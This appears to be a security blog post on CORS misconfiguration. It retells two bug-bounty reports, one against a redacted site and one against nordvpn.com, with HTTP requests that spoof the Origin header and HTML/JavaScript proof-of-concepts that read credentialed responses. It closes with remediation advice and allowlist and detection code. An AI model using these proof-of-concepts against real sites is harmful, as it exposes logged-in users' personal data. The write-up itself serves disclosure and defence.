This blog is all about Cyber Security and IT

CORS [Cross-Origin Resource Sharing]

About CORS [Cross-Origin Resource Sharing]

A cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per request based on the URL and other features of the request. If the site sends the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.
This bug could be used to steal users' information or force the user to execute unwanted actions, as long as a legitimate, logged-in user is lured into opening an attacker-controlled HTML page.


Case 1

In this report I want to describe a high-severity bug which can seriously compromise a user account.

If I am authorized on this site, I can steal users' sessions, some personal information, or perform some actions.

Steps to reproduce

1) Send this request

GET /api/jsonws/relo-service-plugin-portlet.content/get-content-by-slug/slug/page-ex-link HTTP/1.1
Host: www.█████
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: exploit.com
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

In the response headers you can see:

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: exploit.com

{F395049}

So you can write an exploit:

<!DOCTYPE html>
<html>
   <head>
      <script>
         function cors() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
               if (this.readyState == 4 && this.status == 200) {
                  // the cross-origin response was returned with the victim's cookies attached
                  alert(this.responseText);
                  document.getElementById("demo").textContent = this.responseText;
               }
            };
            xhttp.open("GET", "https://www.███/api/jsonws/relo-service-plugin-portlet.content/get-content-by-slug/slug/page-ex-link", true);
            xhttp.withCredentials = true;
            xhttp.send();
         }
      </script>
   </head>
   <body>
      <center>
         <h2>CORS PoC Exploit</h2>
         <h3>created by <a href="https://twitter.com/Jarvis7717">@Jarvis</a></h3>
         <h3>Show full content of page</h3>
         <div id="demo">
            <button type="button" onclick="cors()">Exploit</button>
         </div>
      </center>
   </body>
</html>

Result:
{F395063}

How to fix

Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

Impact

An attacker would lure many victims to visit the attacker's website; if a victim is logged in, their personal information is recorded on the attacker's server. The attacker can perform any action in the user's account, bypassing CSRF tokens.


Case 2

A CORS misconfiguration is found on https://nordvpn.com/nordvpn.com, as "Access-Control-Allow-Origin" is dynamically taken from the client's Origin header with "Credentials" set to true.

Steps To Reproduce:
Step 1:
Request:
GET /wp-json/ HTTP/1.1
Host: nordvpn.com
Origin: http://iamsoevil.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:
HTTP/1.1 200 OK
Date: Sun, 15 Dec 2019 07:03:00 GMT
Content-Type: application/json; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Expires: Sun, 15 Dec 2019 07:33:00 GMT
Pragma: no-cache
X-Robots-Tag: noindex
Link: https://nordvpn.com/wp-json/; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Access-Control-Allow-Origin: http://iamsoevil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin
X-Generator: front-kr-web-2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Cache: MISS
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: HIT
Age: 382
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 54568e251c4bd59b-BOM
Content-Length: 91608

Note: In the request I injected the header Origin: http://iamsoevil.com, and the response returned Access-Control-Allow-Origin: http://iamsoevil.com, which means there is a CORS misconfiguration here (refer to the attached screenshot).

Step 2: Exploiting the CORS misconfiguration.
1) Open https://example.com in a browser, inspect the page and go to the console. Run the following code in the console and it pops up the user information; alternatively, open the code below in any browser and it pops up the user information as shown in the attachment.
Code:
<html>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://nordvpn.com/wp-json/wp/v2/users/1', true);
req.withCredentials = true;
req.send('{}');
function reqListener() {
   alert(this.responseText);
}
</script>
</html>

Remediation:
Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.
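The following is an added example, not code from either report or from the affected sites, covering the "How to fix" advice of Case 1 and the "Remediation" advice of Case 2 together: the reflecting behaviour both cases exhibit, beside an exact-match allowlist check, plus a check that flags the reflecting pattern in a captured response. The allowlist entries and the function names are assumed.

```javascript
// Added example (not from the reports): allowlist check vs. reflecting behaviour.

// Vulnerable pattern observed in both cases: echo any Origin the client sent
// and still allow credentials, so any site can read the authenticated response.
function reflectingCorsHeaders(originHeader) {
  if (!originHeader) return {};
  return {
    "Access-Control-Allow-Origin": originHeader,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Assumed allowlist of full origins (scheme + host [+ port]); no wildcards.
const TRUSTED_ORIGINS = new Set([
  "https://www.example.com",
  "https://app.example.com",
]);

// Hardened pattern: parse the Origin, normalize it, and require an exact match.
// Substring or regex checks would let "https://www.example.com.evil.net" or
// "https://evil-www.example.com" through; exact matching does not.
// Vary: Origin keeps caches from serving one origin's answer to another.
function allowlistCorsHeaders(originHeader, trusted = TRUSTED_ORIGINS) {
  if (!originHeader) return {};
  let parsed;
  try { parsed = new URL(originHeader); } catch { return {}; } // e.g. "exploit.com" has no scheme
  const origin = parsed.origin;
  if (!trusted.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Case-insensitive header lookup (HTTP header names are case-insensitive).
function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? undefined : headers[key];
}

// Detection check for a captured response: the test origin was reflected (or
// "null" was allowed) while credentials are enabled, as in both reports.
function isCredentialedCorsMisconfig(testOrigin, responseHeaders) {
  const acao = getHeader(responseHeaders, "Access-Control-Allow-Origin");
  const acac = (getHeader(responseHeaders, "Access-Control-Allow-Credentials") || "").toLowerCase();
  if (acac !== "true" || !acao) return false;
  return acao === testOrigin || acao === "null";
}
```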

References:
https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
https://ejj.io/misconfigured-cors/

Reference Reports: #430249 #317391 #426147 #470298

Impact

1) In this report I want to describe a high-severity bug which can seriously compromise a user account. If I am authorized on this site, I can steal users' sessions, some personal information, or perform some actions.
2) An attacker would lure many victims to visit the attacker's website; if a victim is logged in, their personal information is recorded on the attacker's server.
3) Also, if the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.
